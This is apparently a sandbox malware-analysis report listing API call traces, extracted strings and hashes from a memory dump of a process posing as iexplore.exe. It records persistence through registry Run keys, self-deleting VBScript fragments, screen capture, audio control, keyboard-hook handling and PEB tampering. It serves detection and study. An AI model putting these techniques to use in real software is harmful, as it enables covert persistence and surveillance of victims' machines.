                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: a7c06d4e72bd6a220cd54782d62252ab503f7cdda72d6c53ffccd0d292e67d7c
                                                  • Instruction ID: b2687b0f73646294b984aab02c9496ef5ec767eda3d8ba9cebc4df9973bc9c83
                                                  • Opcode Fuzzy Hash: a7c06d4e72bd6a220cd54782d62252ab503f7cdda72d6c53ffccd0d292e67d7c
                                                  • Instruction Fuzzy Hash: BD810F339001199BCB15EBA0DCA59EDB77AEF14314F50466AD44AA7290FF389F49CFA0
                                                  APIs
                                                    • Part of subcall function 02DB8295: GetLastError.KERNEL32(?,00000000,02DB1CC5,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB8299
                                                    • Part of subcall function 02DB8295: _free.LIBCMT ref: 02DB82CC
                                                    • Part of subcall function 02DB8295: SetLastError.KERNEL32(00000000,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB830D
                                                    • Part of subcall function 02DB8295: _abort.LIBCMT ref: 02DB8313
                                                    • Part of subcall function 02DB8295: _free.LIBCMT ref: 02DB82F4
                                                    • Part of subcall function 02DB8295: SetLastError.KERNEL32(00000000,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB8301
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 02DC279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 02DC27F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 02DC2806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,02DB4AED,00000040,?,02DB4C0D,00000055,00000000,?,?,00000055,00000000), ref: 02DC284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,02DB4B6D,00000040), ref: 02DC286D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID:
                                                  • API String ID: 745075371-0
                                                  • Opcode ID: b2769f6cbeaf2904bd94a6ec3ba7bdb35c15cf0a67055823400bcbe82a9945c8
                                                  • Instruction ID: c186f2a8b558279505162682d287ae62600c93d3bf2090d71c0be6f63fba8382
                                                  • Opcode Fuzzy Hash: b2769f6cbeaf2904bd94a6ec3ba7bdb35c15cf0a67055823400bcbe82a9945c8
                                                  • Instruction Fuzzy Hash: A4515F719002079BEB11EBA4CC88ABA77B9EF08704F24447DED55EB394DB709D44CBA1
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 02D7884C
                                                  • FindFirstFileW.KERNEL32(00000000,?,02DD6618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02D78905
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02D7892D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02D7893A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02D78A50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                  • String ID:
                                                  • API String ID: 1771804793-0
                                                  • Opcode ID: dca45d94d06502a3ae7722cc6fb5631fedad4e47bcd999f8a5dffa2bf716ae21
                                                  • Instruction ID: 1806040716e5b2287b772f82d349f327a6dc97b0f6989ebbaef4b8cccbbe1637
                                                  • Opcode Fuzzy Hash: dca45d94d06502a3ae7722cc6fb5631fedad4e47bcd999f8a5dffa2bf716ae21
                                                  • Instruction Fuzzy Hash: 185121329002099ACB04FB64DD599EDB77AEF10314F904659E80A97390FF389F49DFA1
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02D8CB68
                                                    • Part of subcall function 02D837AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02D837B9
                                                    • Part of subcall function 02D837AA: RegSetValueExA.KERNEL32(?,02DD74C8,00000000,?,00000000,00000000,02DE5300,?,?,02D7F88E,02DD74C8,5.2.0 Pro), ref: 02D837E1
                                                    • Part of subcall function 02D837AA: RegCloseKey.ADVAPI32(?,?,?,02D7F88E,02DD74C8,5.2.0 Pro), ref: 02D837EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: 88e74ffe00cf940cae4a2e33be06225041dd1267b5cabc2df93931099951d2b9
                                                  • Instruction ID: 25f5919c1fdb19fcf26635b93e94dd8aa732a7b5a433e4a3282637effd575635
                                                  • Opcode Fuzzy Hash: 88e74ffe00cf940cae4a2e33be06225041dd1267b5cabc2df93931099951d2b9
                                                  • Instruction Fuzzy Hash: 3D117222FD4A8076F81C31396D1BF6E2A07C346B60F45065AEA072A7C9E5D39E54C7F2
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02D88ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 02D88ED8
                                                    • Part of subcall function 02D89360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 02D89390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 02D88F4E
                                                  • DeleteDC.GDI32(00000000), ref: 02D88F65
                                                  • DeleteDC.GDI32(00000000), ref: 02D88F68
                                                  • DeleteObject.GDI32(00000000), ref: 02D88F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 02D88F8C
                                                  • DeleteDC.GDI32(00000000), ref: 02D88F9D
                                                  • DeleteDC.GDI32(00000000), ref: 02D88FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 02D88FC4
                                                  • GetIconInfo.USER32(?,?), ref: 02D88FF8
                                                  • DeleteObject.GDI32(?), ref: 02D89027
                                                  • DeleteObject.GDI32(?), ref: 02D89034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 02D89041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 02D89077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 02D890A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 02D89110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 02D8917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D891A3
                                                  • DeleteDC.GDI32(?), ref: 02D891B7
                                                  • DeleteDC.GDI32(00000000), ref: 02D891BA
                                                  • DeleteObject.GDI32(00000000), ref: 02D891BD
                                                  • GlobalFree.KERNEL32(?), ref: 02D891C8
                                                  • DeleteObject.GDI32(00000000), ref: 02D8927C
                                                  • GlobalFree.KERNEL32(?), ref: 02D89283
                                                  • DeleteDC.GDI32(?), ref: 02D89293
                                                  • DeleteDC.GDI32(00000000), ref: 02D8929E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 479521175-865373369
                                                  • Opcode ID: 4e7658e3d1c21ffbeb589513b1e6205dcfd496aeb904b0a9aeb42a6c0d160d92
                                                  • Instruction ID: d676e01ef7eb106df9110ba5b0a185434d67cad90e60774538cbeb5b93939245
                                                  • Opcode Fuzzy Hash: 4e7658e3d1c21ffbeb589513b1e6205dcfd496aeb904b0a9aeb42a6c0d160d92
                                                  • Instruction Fuzzy Hash: 6EC13871508345AFD720EF24D858BBBBBE9EB88714F50491DF98997380EB35AD04CB62
                                                  APIs
                                                    • Part of subcall function 02D8288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02D7F903), ref: 02D8289B
                                                    • Part of subcall function 02D8288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02D828AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 02D7D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02D7D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 02D7D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 02D7D5B4
                                                    • Part of subcall function 02D7B8E7: TerminateThread.KERNEL32(02D7A2B8,00000000,02DE5300,pth_unenc,02D7D0F3,02DE52E8,02DE5300,?,pth_unenc), ref: 02D7B8F6
                                                    • Part of subcall function 02D7B8E7: UnhookWindowsHookEx.USER32(02DE5100), ref: 02D7B902
                                                    • Part of subcall function 02D7B8E7: TerminateThread.KERNEL32(02D7A2A2,00000000,?,pth_unenc), ref: 02D7B910
                                                    • Part of subcall function 02D8C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02DD6478,00000000,00000000,02D7D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02D8C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,02DD6478,02DD6478,00000000), ref: 02D7D7FF
                                                  • ExitProcess.KERNEL32 ref: 02D7D80B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-1536747724
                                                  • Opcode ID: fca91ba58e25c43fff7f64d2532d1717d710d475056c793c9753b833b5bec020
                                                  • Instruction ID: f8c5d2f67519cc7829636434b6233349b7c2f48e948f10dee49b2e09e966ea7a
                                                  • Opcode Fuzzy Hash: fca91ba58e25c43fff7f64d2532d1717d710d475056c793c9753b833b5bec020
                                                  • Instruction Fuzzy Hash: 369183326042415AD715FB24E8509AFB3ABEF95304F90496DE48A933D0FF28DD09CEB2
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,02DE50F4,00000003), ref: 02D824CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 02D824DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02D82555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02D82564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D8256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D82576
                                                  • GetCurrentProcessId.KERNEL32 ref: 02D8257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 02D825AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 02D82610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 02D8262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 02D8263C
                                                    • Part of subcall function 02D8C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02DD6478,00000000,00000000,02D7D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02D8C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02D8267C
                                                  • Sleep.KERNEL32(000001F4), ref: 02D826BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 02D826D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D826DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 02D826E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 02D826EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: .exe$WDH$exepath$open$temp_
                                                  • API String ID: 2649220323-3088914985
                                                  • Opcode ID: b31716b32f1d442114b84d4ec3b44ca7c336d150a2501a053c857f63d21c8bfc
                                                  • Instruction ID: 725baa0ac96f232d097e38d40f795f0e0041223bf959a3024c0fa072064f4c55
                                                  • Opcode Fuzzy Hash: b31716b32f1d442114b84d4ec3b44ca7c336d150a2501a053c857f63d21c8bfc
                                                  • Instruction Fuzzy Hash: 3451C071E40206ABEF10B6A0ACA9AFE736DDB44354F500595F846A33C0EF789E49CA60
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 02D8B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 02D8B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02DD60B4), ref: 02D8B209
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,02DE4EF0,00000000), ref: 02D8B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 02D8B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 02D8B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 02D8B28D
                                                  • SetEvent.KERNEL32 ref: 02D8B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 02D8B2BB
                                                  • CloseHandle.KERNEL32 ref: 02D8B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 02D8B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 02D8B2F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                  • API String ID: 738084811-1354618412
                                                  • Opcode ID: eee0585b3bf3912ddb9c7f6df0f43fa6a5f812aecdcbed24c3cabb6cfe3ad1fa
                                                  • Instruction ID: ac57337009a5851b72a6a198fbcc963a1e062c30c1d6514cdaf3a19b298f582d
                                                  • Opcode Fuzzy Hash: eee0585b3bf3912ddb9c7f6df0f43fa6a5f812aecdcbed24c3cabb6cfe3ad1fa
                                                  • Instruction Fuzzy Hash: 6A51C071A88205AEE614B730EC94FBF779EEB80359F50051EF04A96390FF249D09CA72
                                                  APIs
                                                    • Part of subcall function 02D8288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02D7F903), ref: 02D8289B
                                                    • Part of subcall function 02D8288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02D828AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,02DE5300,?,pth_unenc), ref: 02D7D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 02D7D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,02DE5300,?,pth_unenc), ref: 02D7D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02DE5300,?,pth_unenc), ref: 02D7D232
                                                    • Part of subcall function 02D7B8E7: TerminateThread.KERNEL32(02D7A2B8,00000000,02DE5300,pth_unenc,02D7D0F3,02DE52E8,02DE5300,?,pth_unenc), ref: 02D7B8F6
                                                    • Part of subcall function 02D7B8E7: UnhookWindowsHookEx.USER32(02DE5100), ref: 02D7B902
                                                    • Part of subcall function 02D7B8E7: TerminateThread.KERNEL32(02D7A2A2,00000000,?,pth_unenc), ref: 02D7B910
                                                    • Part of subcall function 02D8BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02DD6478,02D7D248,.vbs,?,?,?,?,?,02DE5300), ref: 02D8BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,02DD6478,02DD6478,00000000), ref: 02D7D44D
                                                  • ExitProcess.KERNEL32 ref: 02D7D454
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                  • API String ID: 3797177996-3018399277
                                                  • Opcode ID: a7eba57a6c411a67517e537f52c82b51ed6a423ffc1f421f9e85496bd013fab3
                                                  • Instruction ID: 556c622bd13084485e4603f48c32126046872db4697802809360327c3ecca285
                                                  • Opcode Fuzzy Hash: a7eba57a6c411a67517e537f52c82b51ed6a423ffc1f421f9e85496bd013fab3
                                                  • Instruction Fuzzy Hash: 8E8182326042415BD715FB20E8509AFB3AAEF95304FA0492DE48A573D0FF68DD09CAB2
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,c:\program files (x86)\internet explorer\iexplore.exe,00000001,02D77688,c:\program files (x86)\internet explorer\iexplore.exe,00000003,02D776B0,02DE52E8,02D77709), ref: 02D772BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D772C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 02D772DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D772E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 02D772F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D772F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 02D77305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D77308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 02D77319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D7731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 02D7732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D77330
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$c:\program files (x86)\internet explorer\iexplore.exe$ntdll.dll
                                                  • API String ID: 1646373207-4049906730
                                                  • Opcode ID: 4f331e5729ae2135b54b692e3275ca02e74f2e428414f2a8fb6dc231636e93e8
                                                  • Instruction ID: b9ea53141ebe3ccb2127727f0b87a1941bc92161daf8a833bf6949394c628266
                                                  • Opcode Fuzzy Hash: 4f331e5729ae2135b54b692e3275ca02e74f2e428414f2a8fb6dc231636e93e8
                                                  • Instruction Fuzzy Hash: 1F011EA1F81717A6BB117F7ABC59D1BAF9D9E542513004C27B812D6306EFB8DC10C9E0
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 02D7CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,02DE50F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 02D7CE5B
                                                  • CopyFileW.KERNEL32(c:\program files (x86)\internet explorer\iexplore.exe,00000000,00000000,00000000,00000000,00000000,?,02DE50F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 02D7CF0B
                                                  • _wcslen.LIBCMT ref: 02D7CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 02D7CFA9
                                                  • CopyFileW.KERNEL32(c:\program files (x86)\internet explorer\iexplore.exe,00000000,00000000), ref: 02D7CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02D7CFFE
                                                  • _wcslen.LIBCMT ref: 02D7D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 02D7D018
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DE50F4,0000000E), ref: 02D7D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,02DD6478,02DD6478,00000001), ref: 02D7D086
                                                  • ExitProcess.KERNEL32 ref: 02D7D09D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$c:\program files (x86)\internet explorer\iexplore.exe$del$open
                                                  • API String ID: 1579085052-2317732986
                                                  • Opcode ID: 9dd8c24b3c23660ad8add86cf4f7a0230bfc0484a0b1f936c43054a76d45d6a9
                                                  • Instruction ID: d912bf980384f1781c3abdd0d2fab9c96bee10ae2d043bc75b3f2f941343f429
                                                  • Opcode Fuzzy Hash: 9dd8c24b3c23660ad8add86cf4f7a0230bfc0484a0b1f936c43054a76d45d6a9
                                                  • Instruction Fuzzy Hash: B551D1222583026BDA18B634A860E7FA79FEF90715F90051DF54A973C0FF5CDC058AB6
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 02D8C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 02D8C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 02D8C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 02D8C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02D8C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02D8C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 02D8C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 02D8C1BD
                                                  • _wcslen.LIBCMT ref: 02D8C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 02D8C1EC
                                                  • GetLastError.KERNEL32 ref: 02D8C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 02D8C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 02D8C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 02D8C259
                                                  • GetLastError.KERNEL32 ref: 02D8C261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: 43cd0b09c1e0f725a7be7092d0a50c3c889074d818f6a3c76c82d4779419e6dd
                                                  • Instruction ID: d646832730c438aef84f36c0c037bd6761c6ecb4016d121ad3a28c4264c4cb45
                                                  • Opcode Fuzzy Hash: 43cd0b09c1e0f725a7be7092d0a50c3c889074d818f6a3c76c82d4779419e6dd
                                                  • Instruction Fuzzy Hash: 55418271954306DBD720EFA0D888AABB7ECEB94754F50492BF545C2350EB70CE58C7A2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID:
                                                  • API String ID: 3899193279-0
                                                  • Opcode ID: 97c0aa5710f6c315ffd4633ddd62ddc3783f30d31e3e64cc2d0665bc73ff3f5b
                                                  • Instruction ID: 153389d502e8e54154c296038d06e7be8df78e86dd9a2fea1e5c22f167ea1053
                                                  • Opcode Fuzzy Hash: 97c0aa5710f6c315ffd4633ddd62ddc3783f30d31e3e64cc2d0665bc73ff3f5b
                                                  • Instruction Fuzzy Hash: 96D1C2B1900204EFDF27AF789CA5AEA77A9EF05324F04456DF9479BB80E7719D01CA60
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 02D8C742
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02D8C786
                                                  • RegCloseKey.ADVAPI32(?), ref: 02D8CA50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  • API String ID: 1332880857-3714951968
                                                  • Opcode ID: 1651ee0bc74b8b0cfd2e0fb55bd00251ac7e2c87b177326a6f4a5832ab139343
                                                  • Instruction ID: 339fd16d8a39459de9b8a460250bb4bf53dc9a01212033429ef6d46f6adaf01b
                                                  • Opcode Fuzzy Hash: 1651ee0bc74b8b0cfd2e0fb55bd00251ac7e2c87b177326a6f4a5832ab139343
                                                  • Instruction Fuzzy Hash: 6B81DB321182459AD365EB10D850EEFB7E9FF95304F50492EE59A82290FF34ED49CEA2
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 02D8D66B
                                                  • GetCursorPos.USER32(?), ref: 02D8D67A
                                                  • SetForegroundWindow.USER32(?), ref: 02D8D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 02D8D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,02DE4B58), ref: 02D8D6EE
                                                  • ExitProcess.KERNEL32 ref: 02D8D6F6
                                                  • CreatePopupMenu.USER32 ref: 02D8D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 02D8D711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
